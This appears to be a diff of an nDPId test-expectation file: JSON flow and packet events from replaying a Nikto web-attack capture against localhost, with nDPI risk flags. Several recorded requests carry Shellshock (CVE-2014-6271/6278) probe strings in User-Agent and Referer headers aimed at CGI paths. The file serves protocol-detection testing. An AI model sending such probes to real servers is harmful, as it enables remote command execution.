+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277359,"pkt":"AAAAAAAAAAAAAAAACABFAADK7Z9AAEAGTox\/AAABfwAAAcTwH5DcrNUiTS0awIAYAED+vgAAAQEICp1m\/ZedZv2XR0VUIC9mYXZpY29ucy9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420277361,"pkt":"AAAAAAAAAAAAAAAACABFAAC2klBAAEAGqe9\/AAABfwAAAcTyH5D2pKrzJKNAbIAYAED+qgAAAQEICp1m\/ZmdZv2ZR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01039{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} +01039{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277375,"pkt":"AAAAAAAAAAAAAAAACABFAAEBYRtAAEAG2tl\/AAABfwAAAcUGH5Bwr1nakn6kY4AYAED+9QAAAQEICp1m\/aedZv2nR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277378,"pkt":"AAAAAAAAAAAAAAAACABFAAEBjFVAAEAGr59\/AAABfwAAAcUIH5BgqrSU8g64oYAYAED+9QAAAQEICp1m\/aqdZv2qR0VUIC8gSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277381,"pkt":"AAAAAAAAAAAAAAAACABFAAEKrtxAAEAGjQ9\/AAABfwAAAcUKH5Ddg5Yc5mMQaoAYAED+\/gAAAQEICp1m\/a2dZv2sR0VUIC9hZG1pbi5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277383,"pkt":"AAAAAAAAAAAAAAAACABFAAES8w1AAEAGSNZ\/AAABfwAAAcUMH5A5v8vLlyOw2IAYAED\/BgAAAQEICp1m\/a+dZv2vR0VUIC9hZG1pbmlzdHJhdG9yLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277386,"pkt":"AAAAAAAAAAAAAAAACABFAAEO1qdAAEAGZUB\/AAABfwAAAcUOH5C5aO5oSApQ3oAYAED\/AgAAAQEICp1m\/bKdZv2yR0VUIC9hdXRoTG9naW4uY2dpIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 